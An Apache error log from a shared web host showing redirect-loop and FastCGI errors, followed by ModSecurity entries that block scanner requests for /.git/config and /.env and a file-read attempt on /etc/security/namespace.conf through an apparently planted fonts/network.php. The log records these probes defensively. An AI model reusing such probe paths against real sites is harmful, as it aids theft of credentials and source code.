[Mon May 11 13:29:03.352244 2026] [core:error] [pid 1319885:tid 1319935] [client 20.151.0.198:52063] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:06.957805 2026] [core:error] [pid 1319998:tid 1320018] [client 20.151.0.198:48455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:06.957842 2026] [core:error] [pid 1319998:tid 1320018] [client 20.151.0.198:48455] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:09.423244 2026] [core:error] [pid 1320398:tid 1320423] [client 20.151.0.198:48492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:09.423273 2026] [core:error] [pid 1320398:tid 1320423] [client 20.151.0.198:48492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:12.949186 2026] [core:error] [pid 1320674:tid 1320694] [client 20.151.0.198:14356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:12.949216 2026] [core:error] [pid 1320674:tid 1320694] [client 20.151.0.198:14356] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:16.797356 2026] [core:error] [pid 1320674:tid 1320703] [client 20.151.0.198:61936] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:16.797386 2026] [core:error] [pid 1320674:tid 1320703] [client 20.151.0.198:61936] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:17.935761 2026] [core:error] [pid 1320674:tid 1320696] [client 20.151.0.198:14392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:17.935794 2026] [core:error] [pid 1320674:tid 1320696] [client 20.151.0.198:14392] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:19.932939 2026] [core:error] [pid 1319886:tid 1319913] [client 20.151.0.198:48482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:19.932973 2026] [core:error] [pid 1319886:tid 1319913] [client 20.151.0.198:48482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:21.604659 2026] [core:error] [pid 1319885:tid 1319895] [client 20.151.0.198:61942] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:21.604704 2026] [core:error] [pid 1319885:tid 1319895] [client 20.151.0.198:61942] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:26.047183 2026] [core:error] [pid 1319998:tid 1320006] [client 20.151.0.198:52054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:26.047297 2026] [core:error] [pid 1319998:tid 1320006] [client 20.151.0.198:52054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:26.813908 2026] [core:error] [pid 1320398:tid 1320405] [client 20.151.0.198:61947] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:26.813938 2026] [core:error] [pid 1320398:tid 1320405] [client 20.151.0.198:61947] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:28.113470 2026] [core:error] [pid 1320398:tid 1320418] [client 20.151.0.198:57576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:28.113496 2026] [core:error] [pid 1320398:tid 1320418] [client 20.151.0.198:57576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:30.990732 2026] [security2:error] [pid 1319998:tid 1320005] [client 146.56.199.139:50838] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agG9mqt2WtvoFr7xvGyvsgAAAIU"]
[Mon May 11 13:29:32.507971 2026] [core:error] [pid 1319885:tid 1319938] [client 20.151.0.198:15198] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:32.508003 2026] [core:error] [pid 1319885:tid 1319938] [client 20.151.0.198:15198] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:36.299102 2026] [core:error] [pid 1319885:tid 1319890] [client 20.151.0.198:61921] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:36.299137 2026] [core:error] [pid 1319885:tid 1319890] [client 20.151.0.198:61921] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:38.925534 2026] [core:error] [pid 1320674:tid 1320710] [client 20.151.0.198:48477] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:38.925567 2026] [core:error] [pid 1320674:tid 1320710] [client 20.151.0.198:48477] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:40.654819 2026] [core:error] [pid 1320674:tid 1320705] [client 20.151.0.198:14398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:40.654852 2026] [core:error] [pid 1320674:tid 1320705] [client 20.151.0.198:14398] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:42.398421 2026] [security2:error] [pid 1319886:tid 1319933] [client 146.56.199.139:43978] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/"] [unique_id "agG9pqy-5-wpj6Sx56ZzkQAAABU"], referer: http://www.jeanboyault.fr
[Mon May 11 13:29:43.185118 2026] [core:error] [pid 1320674:tid 1320707] [client 20.151.0.198:14376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:43.185267 2026] [core:error] [pid 1320674:tid 1320707] [client 20.151.0.198:14376] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:44.659715 2026] [core:error] [pid 1319885:tid 1319892] [client 20.151.0.198:52074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:44.659746 2026] [core:error] [pid 1319885:tid 1319892] [client 20.151.0.198:52074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:46.034824 2026] [core:error] [pid 1319953:tid 1319963] [client 20.151.0.198:14390] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:46.034855 2026] [core:error] [pid 1319953:tid 1319963] [client 20.151.0.198:14390] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:47.546842 2026] [core:error] [pid 1319886:tid 1319923] [client 20.151.0.198:52053] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:47.546872 2026] [core:error] [pid 1319886:tid 1319923] [client 20.151.0.198:52053] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:49.760504 2026] [core:error] [pid 1320398:tid 1320420] [client 20.151.0.198:43405] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:49.760537 2026] [core:error] [pid 1320398:tid 1320420] [client 20.151.0.198:43405] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:52.837740 2026] [core:error] [pid 1319886:tid 1319916] [client 20.151.0.198:57548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:52.837774 2026] [core:error] [pid 1319886:tid 1319916] [client 20.151.0.198:57548] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:54.295581 2026] [core:error] [pid 1319998:tid 1320022] [client 20.151.0.198:52074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:54.295617 2026] [core:error] [pid 1319998:tid 1320022] [client 20.151.0.198:52074] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:58.914456 2026] [core:error] [pid 1319953:tid 1319955] [client 20.151.0.198:57545] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:58.914797 2026] [core:error] [pid 1319953:tid 1319955] [client 20.151.0.198:57545] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:30:00.181193 2026] [core:error] [pid 1319998:tid 1320018] [client 20.151.0.198:14367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:30:00.181228 2026] [core:error] [pid 1319998:tid 1320018] [client 20.151.0.198:14367] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:31:06.909669 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:07.068603 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:07.230710 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:07.389181 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:07.547490 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:07.705982 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:07.864462 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:08.022790 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:08.180977 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:08.339303 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:08.497841 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:08.669578 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:08.827827 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:08.986188 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:09.144544 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:09.303121 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:09.463990 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:09.622539 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:09.780899 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:09.939374 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:10.099186 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:10.257559 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:10.443091 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:10.601310 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:10.759563 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:10.918034 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:11.076570 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:11.235193 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:11.393706 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:11.552080 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:11.712902 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:11.871295 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:12.029674 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:12.345613 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:12.661994 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:12.820739 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:13.621599 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:13.967075 2026] [proxy_fcgi:error] [pid 1319953:tid 1319969] [client 4.193.137.131:5775] AH01071: Got error 'Primary script unknown'
[Mon May 11 13:31:16.835164 2026] [ssl:error] [pid 1319886:tid 1319937] (EAI 2)Name or service not known: [client 8.217.214.117:31115] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 13:31:16.835659 2026] [ssl:error] [pid 1319886:tid 1319937] AH01941: stapling_renew_response: responder error
[Mon May 11 13:31:18.261764 2026] [security2:error] [pid 1319885:tid 1319938] [client 34.116.157.102:38466] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agG-BlchVQ3tCn0m9OoznQAAARg"]
[Mon May 11 13:31:18.262620 2026] [security2:error] [pid 1319885:tid 1319938] [client 34.116.157.102:38466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agG-BlchVQ3tCn0m9OoznQAAARg"]
[Mon May 11 13:31:18.263981 2026] [security2:error] [pid 1319885:tid 1319938] [client 34.116.157.102:38466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agG-BlchVQ3tCn0m9OoznQAAARg"]
[Mon May 11 13:31:35.694333 2026] [security2:error] [pid 1320398:tid 1320407] [client 216.73.216.110:12736] ModSecurity: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/security/namespace.conf found within ARGS:filesrc: /etc/security/namespace.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agG-F-JEyNRN152ArORlVQAAAEc"]
[Mon May 11 13:31:35.694996 2026] [security2:error] [pid 1320398:tid 1320407] [client 216.73.216.110:12736] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agG-F-JEyNRN152ArORlVQAAAEc"]
[Mon May 11 13:31:35.788070 2026] [security2:error] [pid 1320398:tid 1320407] [client 216.73.216.110:12736] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agG-F-JEyNRN152ArORlVQAAAEc"]
[Mon May 11 13:32:11.631298 2026] [security2:error] [pid 1320398:tid 1320401] [client 213.209.159.223:43634] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env"] [unique_id "agG-O-JEyNRN152ArORlgAAAAEE"]
[Mon May 11 13:32:11.632903 2026] [security2:error] [pid 1320398:tid 1320401] [client 213.209.159.223:43634] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env"] [unique_id "agG-O-JEyNRN152ArORlgAAAAEE"]
[Mon May 11 13:32:11.740448 2026] [security2:error] [pid 1319885:tid 1319938] [client 213.209.159.223:43674] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env"] [unique_id "agG-O1chVQ3tCn0m9Ooz-QAAARg"]
[Mon May 11 13:32:11.742025 2026] [security2:error] [pid 1319885:tid 1319938] [client 213.209.159.223:43674] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env"] [unique_id "agG-O1chVQ3tCn0m9Ooz-QAAARg"]
[Mon May 11 13:32:11.743517 2026] [security2:error] [pid 1319998:tid 1320022] [client 213.209.159.223:43686] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.rentparadise.fr"] [uri "/.env"] [unique_id "agG-O6t2WtvoFr7xvGywvAAAAJY"]
[Mon May 11 13:32:11.743749 2026] [security2:error] [pid 1319998:tid 1320022] [client 213.209.159.223:43686] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.rentparadise.fr"] [uri "/.env"] [unique_id "agG-O6t2WtvoFr7xvGywvAAAAJY"]
